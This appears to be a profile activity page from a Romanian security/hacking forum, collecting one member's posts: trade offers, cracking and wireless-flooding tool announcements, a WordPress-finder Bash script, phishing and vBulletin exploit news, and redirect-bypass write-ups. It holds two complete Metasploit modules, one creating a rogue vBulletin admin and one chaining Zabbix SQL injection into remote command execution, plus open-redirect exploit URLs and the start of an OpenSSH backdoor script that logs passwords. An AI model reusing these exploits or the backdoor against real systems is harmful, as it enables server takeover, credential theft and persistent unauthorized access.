Jump to content

Fi8sVrs

Active Members
 View Profile  See their activity

  • Posts

    3206

  • Joined

  • Days Won

    87

 Content Type 

Everything posted by Fi8sVrs

  1. Fi8sVrs
    up . sau transfer bancar
  2. Fi8sVrs
    down //closed
  3. Fi8sVrs
    hwk is an easy-to-use wireless authentication and de-authentication tool. Furthermore, it also supports probe response fuzzing, beacon injection flooding, antenna alignment and various injection testing modes. Information gathering is selected by default and shows the incoming traffic indicating the packet types. /******************************************************************************* * ____ _ __ * * ___ __ __/ / /__ ___ ______ ______(_) /___ __ * * / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // / * * /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, / * * /___/ team * * * * README * * * * DATE * * 8/03/2013 * * * * AUTHOR * * atzeton - http://www.nullsecurity.net/ * * * * LICENSE * * GNU GPLv2, see COPYING * * * ******************************************************************************/ What is hwk? =============== hwk is a collection of packet crafting/network flooding tools: - hawk for flooding the air with preconfigured or non-interactivly gained information - eagle for RADIOTAP WLAN MGT and LLC header packet crafting. It also supports appending random 'payload' WARNING: This is an BETA release since it hasn't been tested sufficiently. Dependencies: ============= - libpcap How to install? =============== make (as root) make install make clean INFO: CAP_NET_RAW, CAP_NET_ADMIN, CAP_SYS_ADMIN (ioctls) capabilities are automatically set during installation. Usage ===== See --help or the man files of hawk/eagle or man files! Bugs ===== If you find any bugs, feel free to drop me a line! Stay tuned ========== * http://nullsecurity.net/ Download HWK Wireless Auditing Tool 0.4 ? Packet Storm
  4. Fi8sVrs
    AIEngine is a packet inspection engine with capabilities of learning without any human intervention. AIEngine helps network/security profesionals to identify traffic and develop signatures for use them on NIDS, Firewalls, Traffic classifiers and so on. Using AIEngine To use AIEngine just execute the binary aiengine: luis@luis-xps:~/c++/aiengine/src$ ./aiengine -h iaengine 0.1 Mandatory arguments: -I [ --interface ] arg Sets the network interface. -P [ --pcapfile ] arg Sets the pcap file. Link Layer optional arguments: -q [ --tag ] arg Selects the tag type of the ethernet layer (vlan,mpls). TCP optional arguments: -t [ --tcp-flows ] arg (=32768) Sets the number of TCP flows on the pool. UDP optional arguments: -u [ --udp-flows ] arg (=16384) Sets the number of UDP flows on the pool. Signature optional arguments: -R [ --enable-signatures ] Enables the Signature engine. -r [ --regex ] arg (=.*) Sets the regex for evaluate agains the flows. -c [ --flow-class ] arg (=all) Uses tcp, udp or all for matches the signature on the flows. Frequencies optional arguments: -F [ --enable-frequencies ] Enables the Frequency engine. -g [ --group-by ] arg (=dst-port) Groups frequencies by src-ip,dst-ip,src-por t and dst-port. -f [ --flow-type ] arg (=tcp) Uses tcp or udp flows. -L [ --enable-learner ] Enables the Learner engine. -k [ --key-learner ] arg (=80) Sets the key for the Learner engine. Optional arguments: -k [ --stack ] arg (=lan) Sets the network stack (lan,mobile). -d [ --dumpflows ] Dump the flows to stdout. -s [ --statistics ] arg (=0) Show statistics of the network stack. -p [ --pstatistics ] Show statistics of the process. -h [ --help ] Show help. -v [ --version ] Show version string. Integrating AIEngine with other systems AIEngine have a python module in order to be more flexible in terms of integration with other systems and functionalities. The main objects that the python module provide are the followin. Check the wiki pages in order to have more examples. Flow |---> getDestinationAddress |---> getDestinationPort |---> getFrequencies |---> getHTTPHost |---> getHTTPUserAgent |---> getPacketFrequencies |---> getProtocol |---> getSourceAddress |---> getSourcePort |---> getTotalBytes |---> getTotalPackets |---> getTotalPacketsLayer7 FlowManager Frequencies |---> getDispersion |---> getEnthropy |---> getFrequenciesString HTTPHost HTTPUserAgent LearnerEngine |---> agregateFlows |---> compute |---> getRegularExpression |---> getTotalFlowsProcess NetworkStack |---> enableFrequencyEngine |---> enableLinkLayerTagging |---> getTCPFlowManager |---> getUDPFlowManager |---> printFlows |---> setStatisticsLevel |---> setTCPSignatureManager |---> setTotalTCPFlows |---> setTotalUDPFlows |---> setUDPSignatureManager PacketDispatcher |---> closeDevice |---> closePcapFile |---> openDevice |---> openPcapFile |---> run |---> runPcap |---> setStack PacketFrequencies |---> getPacketFrequenciesString Signature |---> getExpression |---> getMatchs |---> getName SignatureManager |---> addSignature StackLan |---> enableFrequencyEngine |---> enableLinkLayerTagging |---> getTCPFlowManager |---> getUDPFlowManager |---> printFlows |---> setStatisticsLevel |---> setTCPSignatureManager |---> setTotalTCPFlows |---> setTotalUDPFlows |---> setUDPSignatureManager StackMobile |---> enableFrequencyEngine |---> enableLinkLayerTagging |---> getTCPFlowManager |---> getUDPFlowManager |---> printFlows |---> setStatisticsLevel |---> setTCPSignatureManager |---> setTotalTCPFlows |---> setTotalUDPFlows |---> setUDPSignatureManager Compile AIEngine $ git clone git://bitbucket.com/camp0/aiengine $ ./autogen.sh $ ./configure $ make Contributing to AIEngine AIEngine is under the terms of GPLv2 and is under develop. Check out the AIEngine source with $ git clone git://bitbucket.com/camp0/aiengine https://bitbucket.org/camp0/aiengine/
  5. Fi8sVrs
    Cumpar 100 usd perfect money platesc credit sms orange
  6. Fi8sVrs
    Description Originally designed as a word list creation tool, thad0ctor's BT5 Toolkit has become an all purpose security script to help simplify many Backtrack 5 functions to help Pentesters strengthen their systems. The backbone of thad0ctor's Backtrack 5 Toolkit is the Wordlist Toolkit that contains a plethora of tools to create, modify, and manipulate word lists in order for end users to strengthen their systems by testing their passwords against a variety of tools designed to expose their pass phrases. In short it is the ultimate tool for those looking to make a wide variety of word lists for dictionary based and other brute force attacks. The toolkit is designed with usability in mind for the Backtrack 5R2 linux distro but will also work on BT5 R1 and other Ubuntu based distros if configured properly. The script is constantly updated with multiple revisions to include new cutting edge features and improvements in order to provide full spectrum wordlist creation capabilities. Features Create word lists for SSNs, Phone Numbers, Date Ranges, Random Patterns, Password Policies, Patterns, from PDF/EBOOK files, for Default Router Passwords, or by profiling targets Manipulate word lists by changing character cases, mirroring or doubling up words, reversing words prefixing or appending sequences of numbers or characters, inserting text, removing patterns or characters, converting words to 1337 speak, mangling words with John the Ripper and more Optimize word lists by converting them to ASCII, trimming the words to set minimum and maximum lengths, sorting and removing duplicates, removing non-printable characters, splitting word lists into more manageable chunks and more Analyzes word lists by viewing their line count, a break down of their most common patterns and characters used, search word lists for a certain string or sub-string, and calculate the time it would take to process a word list through a aircrack-ng or pyrit based dictionary attack Combine individual word lists or word lists of a directory into a single word list and gather word lists system wide into one directory Fully customize the usage of the script to streamline functionality. Change console output text color, configure passthough attack options for certain attacks, toggle or force on or off the GTK and CLI versions of the script, toggle whether or not to display the start up banner, toggle the main menu style and customize the script 1337ify options. Stay up to date with a fully integrated and fool proof update system that pulls directly from the script's Sourceforge for up to the minute updates and configure whether or not you would like to auto-update the script on start up. Make sure everything is working properly and dependencies are met with an automated dependency check and install system that takes all the pain and guesswork out of dependency issues. Download | Backtrack 5 toolkit Web Site >
  7. Fi8sVrs

    JBrute

    Fi8sVrs posted a topic in Programe hacking

    Description JBrute is an open source tool written in Java to audit security and stronghold of stored password for several open source and commercial apps. It is focused to provide multi-platform support and flexible parameters to cover most of the possible password-auditing scenarios. Java Runtime version 1.7 or higher is required for running JBrute. Supported algorithms: MD5 MD4 SHA-256 SHA-512 MD5CRYPT SHA1 ORACLE-10G ORACLE-11G NTLM LM MSSQL-2000 MSSQL-2005 MSSQL-2012 MYSQL-322 MYSQL-411 POSTGRESQL SYBASE-ASE1502 To see syntax examples: https://sourceforge.net/p/jbrute/wiki/Examples To see last news: https://sourceforge.net/p/jbrute/blog FAQ: https://sourceforge.net/p/jbrute/wiki/FAQ/ General questions: jbrute-users@lists.sourceforge.net (you can suscribe to mailing list at https://lists.sourceforge.net/lists/listinfo/jbrute-users) Author: Gonzalo L. Camino Icon Art: Ivan Zubillaga Made in: Argentina Features Muli-platform support (by Java VM) Several hashing algorithms supported Flexible chained hashes decryption (like MD5(SHA1(MD5()))) Both brute force and dictionary decryption methods supported Build-In rule pre-processor for dictionary decryption Multi-threading support for brute force decryption Download | JBrute Web Site >
  8. Fi8sVrs
    This program find wordpress domains which is hosted on the same server #!/bin/bash # # --------------------------------- # Server Wordpress Finder # Licence : Linux # --------------------------------- # # Title : Server Wordpress Finder # Code : Bash # Author : RedH4t.Viper # Email : RedH4t.Viper@Gmail.com , RedH4t.Viper@yahoo.com # Released : 2013 18 June # Home : IrIsT Security Center # Thanks : IrIsT ,TBH ,kurdhackteam , 3xp1r3 , thecrowscrew # # Gr33tz : Am!r | C0dex | B3HZ4D | TaK.FaNaR | 0x0ptim0us | Skote_Vahshat | # Gr33tz : Net.W0lf | Dj.TiniVini| Mr.XHat | Black King | Devil | # Gr33tz : E2MAEN | () | M4st3r4N0nY |Turk Sever | dr.koderz | V30sharp # Gr33tz : ARTA | Mr.Zer0 | Sajjad13and11 | Silent | Smartprogrammer | # Gr33tz : x3o-1337 | rEd X | No PM | Gabby | Sukhoi Su-37 | IR Anonymous | # Gr33tz : Megatron | Zer0 | sole sad | Medrik | F@rid | And All Of IrIsT Memebrz | #------------------------------------------------------------------------------------------# page=0 how_many=1 IP_SERVER=$1 single_page= last_page_check= banner() { echo " _ _______ ______ _ _ " echo " | | | | ___ \ | ___(_) | | " echo " | | | | |_/ / | |_ _ _ __ __| | ___ _ __ " echo " | |/\| | __/ | _| | | '_ \ / _\ |/ _ \ '__| " echo " \ /\ / | | | | | | | | (_| | __/ | " echo " \/ \/\_| \_| |_|_| |_|\__,_|\___|_| " echo " " } Usage() { echo "" echo "# ***************************************************************************??***?*?*********************#" echo "# Usage : Server Wordpress Finder <IP/Domain> *#" echo "# Help : -h && --help : Show This Menu *#" echo "# RunScript : Give Permision to script and run it !! *#" echo "# ***************************************************************************??***?*?*********************#" echo "" } Check_Arguments() { if [ -z "$IP_SERVER" ] || [ "$IP_SERVER" == "-h" ] || [ "$IP_SERVER" == "--help" ]; then Usage; exit fi } Searching_Jce() { rm -rf domains.txt rm -rf alldomain_bing.txt rm -rf IndexDomain.txt if [ `echo "$IP_SERVER" | egrep "(([0-9]+\.){3}[0-9]+)|\[[a-f0-9:]+\]"` ]; then IP="$IP_SERVER" else IP=`resolveip -s "$IP_SERVER"` if [ "$?" != 0 ]; then echo -e "[-] Error: cannot resolve $IP_SERVER to an IP " fi fi echo -e "\e[1;35m[*] Finded Wordpress Web Sites Will be Save at finded.txt \e[0m" echo -e "\e[1;35m[*] Searching WP on $IP Plz W8 \e[0m" touch alldomain_bing.txt; while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do url="http://www.bing.com/search?q=ip%3a$IP+%27%2f%E2%80%8Bwp-content%2f%27&qs=n&pq=ip%3a$IP+%27%2f%E2%80%8Bwp-content%2f%27&sc=0-15&sp=-1&sk=&first=${page}1&FORM=PERE" wget -q -O domain_bing.php "$url" last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' domain_bing.php` # if no results are found, how_many is empty and the loop will exit how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3` # check for a single page of results single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' domain_bing.php ` cat domain_bing.php | egrep -o "<h3><a href=\"[^\"]+" domain_bing.php | cut -d '"' -f 2 >> alldomain_bing.txt rm -f domain_bing.php let page=$page+1 done cat alldomain_bing.txt | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | sed '/www./s///g' | tr '[:upper:]' '[:lower:]' | sort | uniq >> domains.txt for domain in `cat domains.txt` do echo "$domain" | grep "wp-content" >> /dev/null;check=$? if [ $check -eq 0 ] then echo "$domain" >>IndexDomain.txt fi done #awk '{gsub("wp-content","")}1' | cat IndexDomain.txt | cut -d '/' -f 1 | sort | uniq >> finded.txt found_N=`wc -l finded.txt | sed 's/finded.txt//'` echo -e "\e[1;34m[+] Found $found_N \e[0m" for wp in `cat finded.txt` do echo -e "\e[1;32m[*] $wp \e[0m" done rm -rf domains.txt rm -rf alldomain_bing.txt rm -rf IndexDomain.txt } main() { banner ; Check_Arguments; Searching_Jce; } main;
  9. Fi8sVrs
    Symantec researchers have recently stumbled upon a phishing site that packs a double whammy: the site asks the user either to log into Facebook or to download an app in order to activate a bogus service that will supposedly let them know who visited their Facebook profile (click on the screenshot to enlarge it): For those who opt for the first option and enter their Facebook login credentials the news is bad: their username and password has been sent to the phishers, and will likely be used to hijack the victims' account. For those who chose the latter option, the news could be even worse. The file (WhoViewedMyfacebookProfile.rar) offered for download contains an information-stealing Trojan, which can potentially gather all kinds of confidential information from the victims' computer - including personal, financial and login information for different online services - and is set to send them to the attacker’s email address. But, as the researchers noted, that email address has not been valid for 3 month, so the information gets sent and lost into a virtual black hole of the Internet. Nevertheless, the malware can get updated at any moment, and the email address in question changed to a valid one. "If users fell victim to the phishing site by entering their login credentials, the phishers would have successfully stolen their information for identity theft purposes," note the researchers. The phished credentials are, then, obviously sent to servers controlled by the attackers, and not to the aforementioned email address. But whether this phishing scam is stil active or not is not the point, because other similar ones are popping up daily. The good thing to remember is to be careful about where you are entering your account credentials (always check if the URL is the right one, and don't follow links from unsolicited emails) and what software you download (don't accept software you haven't asked for, and be careful when searching for software online - keep to established download sites). Via Bogus Facebook login page steals credentials, pushes malware
  10. Fi8sVrs
    This module abuses the "install/upgrade.php" component on vBulletin 4.1+ and 4.5+ to create a new administrator account, as exploited in the wild on October 2013. This module has been tested successfully on vBulletin 4.1.5 and 4.1.0. Module Name auxiliary/admin/http/vbulletin_upgrade_admin Authors Unknown juan vazquez <juan.vazquez [at] metasploit.com> References URL: https://rstforums.com/forum/76476-dangerous-vbulletin-exploit-wild.rst URL: Dangerous vBulletin exploit in the wild URL: Potential vBulletin Exploit (vBulletin 4.1+, vBulletin 5+) - vBulletin Community Forum Module Options To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced': msf > use auxiliary/admin/http/vbulletin_upgrade_admin msf auxiliary(vbulletin_upgrade_admin) > show actions ...actions... msf auxiliary(vbulletin_upgrade_admin) > set ACTION <action-name> msf auxiliary(vbulletin_upgrade_admin) > show options ...show and set options... msf auxiliary(vbulletin_upgrade_admin) > run Development Source Code ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report def initialize(info = {}) super(update_info(info, 'Name' => 'vBulletin Administrator Account Creation', 'Description' => %q{ This module abuses the "install/upgrade.php" component on vBulletin 4.1+ and 4.5+ to create a new administrator account, as exploited in the wild on October 2013. This module has been tested successfully on vBulletin 4.1.5 and 4.1.0. }, 'Author' => [ 'Unknown', # Vulnerability discoverer? found in the wild 'juan vazquez' #metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'http://www.net-security.org/secworld.php?id=15743' ], [ 'URL', 'http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/3991423-potential-vbulletin-exploit-vbulletin-4-1-vbulletin-5'] ], 'DisclosureDate' => 'Oct 09 2013')) register_options( [ OptString.new('TARGETURI', [ true, "The vbulletin URI", '/']), OptString.new('USERNAME', [true, 'The username for the new admin account', 'msf']), OptString.new('PASSWORD', [true, 'The password for the new admin account', 'password']), OptString.new('EMAIL', [true, 'The email for the new admin account', 'msf@email.loc']) ], self.class) end def user datastore["USERNAME"] end def pass datastore["PASSWORD"] end def run if user == pass print_error("#{peer} - Please select a password different than the username") return end print_status("#{peer} - Trying a new admin vBulletin account...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "install", "upgrade.php"), 'method' =>'POST', 'vars_post' => { "version" => "install", "response" => "true", "checktable" => "false", "firstrun" => "false", "step" => "7", "startat" => "0", "only" => "false", "options[skiptemplatemerge]" => "0", "reponse" => "yes", "htmlsubmit" => "1", "htmldata[username]" => user, "htmldata[password]" => pass, "htmldata[confirmpassword]" => pass, "htmldata[email]" => datastore["EMAIL"] }, 'headers' => { "X-Requested-With" => "XMLHttpRequest" } }) if res and res.code == 200 and res.body =~ /Administrator account created/ print_good("#{peer} - Admin account with credentials #{user}:#{pass} successfully created") report_auth_info( :host => rhost, :port => rport, :sname => 'http', :user => user, :pass => pass, :active => true, :proof => res.body ) else print_error("#{peer} - Admin account creation failed") end end end History vBulletin Administrator Account Creation | Rapid7
  11. Fi8sVrs
    vBulletin is a popular proprietary CMS that was recently reported to be vulnerable to an unspecified attack vector. vBulletin is currently positioned 4th in the list of installed CMS sites on the Internet. Hence, the threat potential is huge. Although vBulletin has not disclosed the root cause of the vulnerability or its impact, we determined the attacker’s methods. The identified vulnerability allows an attacker to abuse the vBulletin configuration mechanism in order to create a secondary administrative account. Once the attacker creates the account, they will have full control over the exploited vBulletin application, and subsequently the supported site. Initial analysis Although vBulletin has not disclosed the root cause of the vulnerability or the impact on customers, they did provide a workaround in a blog post encouraging customers to delete the /install, /core/install in vBulleting 4.x and 5.x respectively. Additionally, on vBulletin internal forums a victimized user shared his server’s Apache log, providing some visibility into the attacker’s procedure: This log indicates that the attacker continuously scans, using “GET” requests, for the “/install/upgrade.php” vulnerable resource. Once successful , indicated by the “200”response code, as opposed to “404” response code for non-existing resources, the attacker issues a “POST” request to the same resource with the attack payload. Since the Apache logger does not log the parameters of POST requests, the details of the attack are not yet revealed. Once we had access to some concrete technical details on the vulnerability, we were able to effectively scan hacker forums in search of an exploit code. Soon after, we found PHP code that implements the attack. Next, we carefully installed the code in our lab. The interface clearly states the goal of the attack: injecting a new admin. In order to exploit the vulnerability and inject a new Admin user, the attacker needs to provide the following details: The vulnerable vBulletin upgrade.php exact URL The customer ID. To get these details, the attackers created an additional auxiliary PHP script. The script scans a site for the vulnerable path, exactly as shown above in the reported Apache log, and extracts the customer ID from the vulnerable upgrade.php page, as it’s embedded within the page’s source code. Consequently, the attacker now knows both the vBulletin’s upgarde.php vulnerable URL and the customer ID. With this information, the attack can be launched. Here is an example of the POST request with the attack payload (the red fields match to the information the attacker needed to enter in the PHP interface above). The result of the attack was exactly what the exploit package described. A new admin user was created (“eviladmin”) that is under the control of the attacker. The site has been successfully compromised. Recommendations: vBulletin has advised its customers to delete /install and /core/install directories in versions 4.x and 5.x respectively. For vBulletin users not able to delete these directories – it is advised to block access or redirect requests that hit upgrade.php through via either a WAF, or via web server access configuration. Source: Dangerous vBulletin exploit in the wild
  12. Fi8sVrs
    This Metasploit module exploits an unauthenticated SQL injection vulnerability affecting Zabbix versions 2.0.8 and lower. The SQL injection issue can be abused in order to retrieve an active session ID. If an administrator level user is identified, remote code execution can be gained by uploading and executing remote scripts via the 'scripts_exec.php' file. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => "Zabbix 2.0.8 SQL Injection and Remote Code Execution", 'Description' => %q{ This module exploits an unauthenticated SQL injection vulnerability affecting Zabbix versions 2.0.8 and lower. The SQL injection issue can be abused in order to retrieve an active session ID. If an administrator level user is identified, remote code execution can be gained by uploading and executing remote scripts via the 'scripts_exec.php' file. }, 'License' => MSF_LICENSE, 'Author' => [ 'Lincoln <Lincoln[at]corelan.be>', # Discovery, Original Proof of Concept 'Jason Kratzer <pyoor[at]corelan.be>' # Metasploit Module ], 'References' => [ ['CVE', '2013-5743'], ['URL', 'https://support.zabbix.com/browse/ZBX-7091'] ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Targets' => [ ['Zabbix version <= 2.0.8', {}] ], 'Privileged' => false, 'Payload' => { 'Space' => 255, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl python' } }, 'DisclosureDate' => "Sep 23 2013", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The URI of the vulnerable Zabbix instance', '/zabbix']) ], self.class) end def uri return target_uri.path end def check # Check version print_status("#{peer} - Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "httpmon.php") }) if res and res.code == 200 and res.body =~ /(STATUS OF WEB MONITORING)/ and res.body =~ /(?<=Zabbix )(.*)(?= Copyright)/ version = $1 print_status("#{peer} - Zabbix version #{version} detected") else # If this fails, guest access may not be enabled print_status("#{peer} - Unable to access httpmon.php") return Exploit::CheckCode::Unknown end if version and version <= "2.0.8" return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end end def get_session_id # Generate random string and convert to hex sqlq = rand_text_alpha(8) sqls = sqlq.each_byte.map { |b| b.to_s(16) }.join sqli = "2 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x#{sqls},(SELECT MID((IFNULL(CAST" sqli << "(sessionid AS CHAR),0x20)),1,50) FROM zabbix.sessions WHERE status=0 and userid=1 " sqli << "LIMIT 0,1),0x#{sqls},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)" # Extract session id from database res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri("#{uri}", "httpmon.php"), 'vars_get' => { "applications" => sqli } }) if res && res.code == 200 and res.body =~ /(?<=#{sqlq})(.*)(?=#{sqlq})/ session = $1 print_status("#{peer} - Extracted session cookie - [ #{session} ]") return session else fail_with(Failure::Unknown, "#{peer} - Unable to extract a valid session") end end def exploit # Retrieve valid session id @session = get_session_id @sid = "#{@session[16..-1]}" script_name = rand_text_alpha(8) # Upload script print_status("#{peer} - Attempting to inject payload") res = send_request_cgi({ 'method' => 'POST', 'cookie' => "zbx_sessionid=#{@session}", 'uri' => normalize_uri(uri, "scripts.php"), 'vars_post' => { 'sid' => @sid, 'form' => 'Create+script', 'name' => script_name, 'type' => '0', 'execute_on' => '1', 'command' => payload.encoded, 'commandipmi' => '', 'description' => '', 'usrgrpid' => '0', 'groupid' => '0', 'access' => '2', 'save' => 'Save' } }) if res and res.code == 200 and res.body =~ /(Script added)/ print_status("#{peer} - Payload injected successfully") else fail_with(Failure::Unknown, "#{peer} - Payload injection failed!") end # Extract 'scriptid' value @scriptid = /(?<=scriptid=)(\d+)(?=&sid=#{@sid}">#{script_name})/.match(res.body) # Trigger Payload res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri("#{uri}", "scripts_exec.php"), 'cookie' => "zbx_sessionid=#{@session}", 'vars_get' => { "execute" =>1, "scriptid" => @scriptid, "sid" => @sid, "hostid" => "10084" } }) end def cleanup post_data = "sid=#{@sid}&form_refresh=1&scripts[#{@scriptid}]=#{@scriptid}&go=delete&goButton=Go (1)" print_status("#{peer} - Cleaning script remnants") res = send_request_cgi({ 'method' => 'POST', 'data' => post_data, 'cookie' => "zbx_sessionid=#{@session}", 'uri' => normalize_uri(uri, "scripts.php") }) if res and res.code == 200 and res.body =~ /(Script deleted)/ print_status("#{peer} - Script removed successfully") else print_warning("#{peer} - Unable to remove script #{@scriptid}") end end end Zabbix 2.0.8 SQL Injection / Remote Code Execution ? Packet Storm
  13. Fi8sVrs
    Frams' Shell Tools is a big collection of various (mostly Perl) scripts to make Unix everyday life at the command line interface more comfortable. They have grown in the author's last 20 years as a Unix user, programmer, and administrator. Some examples are: clp (Command Line Perl: a Perl "shell"), fpg (Frams' Perl grep: a grep with full Perl support), zz (generic clipboard), and nvt (Network Virtual Terminal: a better telnet for scripting). http://fex.rus.uni-stuttgart.de/fstools/ To install all programs in one go: wget -O- http://fex.rus.uni-stuttgart.de/sw/share/fstools-0.0.tar | tar xvf - Frams' Shell Tools – Freecode
  14. Fi8sVrs
    posibil sa apara pe 31 oficial https://www.htbridge.com/news/what_s_your_email_security_worth_12_dollars_and_50_cents_according_to_yahoo.html ==================================================================== Google: On October 9, 2013, we announced a new, experimental program that rewards proactive security improvements to select open-source projects. This effort complements and extends our long-running vulnerability reward programs for Google web applications and for Google Chrome. https://www.google.com/about/appsecurity/patch-rewards/
  15. Fi8sVrs
    Google Translate suffers from an open redirection vulnerability. Summary The issue being described below affects google translate and is not exactly an open redirect. However the results can be the same under certain conditions. The following issue can be used as an open redirect when: Potential victim must not block javascripts from being executed in his/her browser. Potential victim’s browser must not warn him/her about redirections. Potential victim’s browser must allow breaking out of iframes. E.x visit the following link with firefox: http://translate.google.com/translate?u=http://www.solvix.gr/accomplished.html Details When you want to translate a webpage you can visit http://translate.google.com/translate?u=yoursite where “yoursite” is the webpage you want to translate. Of course you can add and other parameters like “sl=” and ”tl=” if you want to specify the source language and the language you want your site to be translated to. But lets keep it simple. If you try to create a redirect, the redirection will happen inside google’s frame. For example the following url: http://translate.google.com/translate?u=http://www.solvix.gr/notaccomplished.html notaccomplished.html has the following code: <script type=”text/javascript”> { window.location.assign(“http://www.solvix.gr/notaccomplished2.html”) } </script> will redirect you from http://www.solvix.gr/notaccomplished.html to http://www.solvix.gr/notaccomplished2.html But you are still inside google’s frame. But what will happen if you just try to get yourself out of google’s frame? Hmmm then you just get yourself out of google’s frame. That simple. Check the following url: http://translate.google.com/translate?u=http://www.solvix.gr/accomplished.html You will be redirected in my new blog, without any warning. accomplished.html has the following code <script language=’Javascript’> if (top.location!= self.location) { top.location = self.location.href } </script> <script> { window.location.assign(“http://www.solvix.gr”) } </script> Conclusion This issue is caused because google translate allows the execution of javascript from the remote site. However, this is not an XSS. Javascript is not executed on google’s domain. Some browsers do not allow you to break the iframe (at least not with my code above) while others warn you about the redirection. However some of the most common browsers like firefox and Internet Explorer 8 will be affected. ———————————————————————————————————————————————— Tested and working on: Firefox 24.0 Firefox 23.0.1 I.E 8.0.6001 Opera 12.16 (Opera warns about the redirection but you can still escape from the frames. Check the following url: http://translate.google.com/translate?u=http://www.solvix.gr/or8.html ) Not working: Konqueror Version 4.10.5 Using KDE Development Platform 4.10.5 (https://bugs.kde.org/show_bug.cgi?id=57038) I.E 10 Google Chrome 30.0.1599.69 m Google Chrome Version 31.0.1650.12 beta (browser warns about the redirection) ———————————————————————————————————————————————— ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Source
  16. Fi8sVrs
    According to WordPress, version 3.6 is affected by a URL Redirect Restriction Bypass issue that allows an attacker to craft a URL in such a way that, should it be clicked, would take the victim to a site of the attacker’s choice via the Location: tag in a 302 Redirect. Current descriptions of the WordPress issue may be found at WordPress (1, 2), Mitre and OSVDB. I can confirm that this issue exists in versions 3.1 and 3.6. Due to the range of versions, I assume that it exists in all releases in between but I have not confirmed it. If running an outdated version of WordPress please upgrade to the latest version, which is 3.6.1 at the time of this writing. The current 3.6.1 release fixes four additional issues (1, 2, 3, 4) as well. There are two attack vectors: the first is a full URL redirect; the second is a partial redirect, as the victim is automatically taken to a WordPress error page with the attacker’s link embedded in a prominently displayed <a href> tag. In order for either exploit to work (assuming the victim clicks on the link) two conditions must be true: first, the victim must be logged into the site (wp-admin); and second, they must have permission to the editing page (edit-tags.php or edit-comments.php). If either of these two conditions are false the vulnerable code will not be reached. Exploit 1: edit-tags.php Full URL Direct [vulnerable site]/wp-admin/edit-tags.php?action=delete&_wp_http_referer=http://securitymaverick.com?edit-tags.php The above exploit URL will do a full redirect when the link is clicked on by the victim. It is important to note that in order for the exploit to work the string ‘edit-tags.php’ must be present in the _wp_http_referer parameter. For example: _wp_http_referer=http://securitymaverick.com?edit-tags.php In this case I chose to put it after a ‘?’ and by doing so I create a dummy parameter so that any valid URL before the ‘?’ executes on the attacker’s server. Under normal circumstances servers such as Apache and IIS will not view web application parameters (the stuff after the ‘?’) as pointing to valid server files to execute. On the application side, WordPress should discard the extra parameter. Alternatively an attacker may create a URL such as: _wp_http_referer=http://securitymaverick.com/edit-tags.php This URL has a ‘/’ instead of a ‘?’. This means that the attacker would need to create a valid page named ‘edit-tags.php’ on the attacker’s server in order to have their code run. The normal WordPress login code prevents access to any page under wp-admin if the user has not authenticated. After authentication, the code in edit-tags.php below prevents users without permission from accessing the page: [phpcode]if ( ! current_user_can( $tax->cap->manage_terms ) ) wp_die( __( 'Cheatin’ uh?' ) );[/phpcode] Exploit 2: edit-comments.php Embedded Link Partial Redirect [vulnerable site]/wp-admin/edit-comments.php?action=bulk-comments&_wp_http_referer=http://securitymaverick.com&_wpnonce=1 The above exploit URL will embed the attackers link in the error page of WordPress with the text “Please try again” as seen in the image below. Similar to Exploit 1, the normal WordPress login code prevents access to any page under wp-admin if the user has not authenticated. After authentication, the code in edit-comments.php below prevents users without permission from accessing the page: if ( !current_user_can('edit_posts') ) wp_die(__('Cheatin’ uh?')); Source: CVE-2013-4339: Two Exploits for Wordpress 3.6 URL Redirect Restriction Bypass | SecurityMaverick.com
  17. Fi8sVrs
    This script provides OpenSSH backdoor functionality with a magic password and logs passwords as well. It leverages the same basic idea behind common OpenSSH patches but this script attempts to make the process version agnostic. Use at your own risk. # ============================================ # satyr's openssh autobackdooring doohicky v0.-1 # ImpendingSatyr@gmail.com # ============================================ # USAGE: # Run this script with no args and it'll prompt for the "Magic" password and location to log passwords to (incoming and outgoing). # If you give the location that passwords will be logged to as an arg, this script will try to automate almost everything # (Like common openssh compiling problems, such as missing pam, kerberos, zlib, openssl-devel, etc. # [it'll install them via apt or yum, whichever is available]). # Note: This script will delete itself once it's fairly sure the openssh compile went smoothly. # It's up to you to clean the logs of those yum/apt installs if they're needed, and to restart sshd. # ============================================ # WTF: # I noticed that most openssh code doesn't change too much among versions, and that most openssh backdoors are # just diff patches for specific versions of openssh. So I thought it would be nice to have a script that applies # such a patch based on those similar chunks of code instead of relying on diff patches so that it can be done on different # versions without any modifying (I've seen kiddies apply backdoor patches for a version of openssh that wasn't # originally being used on the box, which is just lazy & dumb). # So I wrote up this to make the whole process a bit easier 